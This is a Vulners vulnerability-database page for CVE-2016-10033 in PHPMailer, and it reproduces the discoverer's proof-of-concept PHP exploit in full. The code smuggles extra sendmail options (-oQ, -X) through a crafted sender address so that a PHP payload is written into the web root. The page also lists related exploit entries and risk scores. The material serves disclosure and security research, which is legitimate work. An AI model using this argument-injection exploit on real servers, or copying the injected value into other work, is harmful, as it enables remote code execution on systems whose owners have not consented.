Vulners
Lucene search
PHPMailer < 5.2.18 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 166 |
|---|---|---|---|---|
 | Exploit for Argument Injection in Phpmailer_Project Phpmailer | 10 May 201712:01 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 26 Mar 202613:28 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 10 May 201703:18 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 9 Feb 201814:53 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 26 Dec 201613:39 | – | githubexploit |
 | PHPMailer 5.2.17 - Remote Code Execution Exploit | 26 Dec 201600:00 | – | zdt |
| PHPMailer < 5.2.18 Remote Code Execution Vulnerability | 26 Dec 201600:00 | – | zdt |
| PHPMailer 5.2.20 - Remote Code Execution Exploit | 28 Dec 201600:00 | – | zdt |
| PHPMailer 5.2.18 - Remote Code Execution (Python) Exploit | 29 Dec 201600:00 | – | zdt |
| PHPMailer Sendmail Argument Injection Exploit | 4 Jan 201700:00 | – | zdt |
10
<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
$msg_body = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "[email protected]";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!\n";
}
?>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Dec 2016 00:00Current
9.9High risk
Vulners AI Score9.9
CVSS 27.5
CVSS 3.19.8
EPSS0.94418
SSVC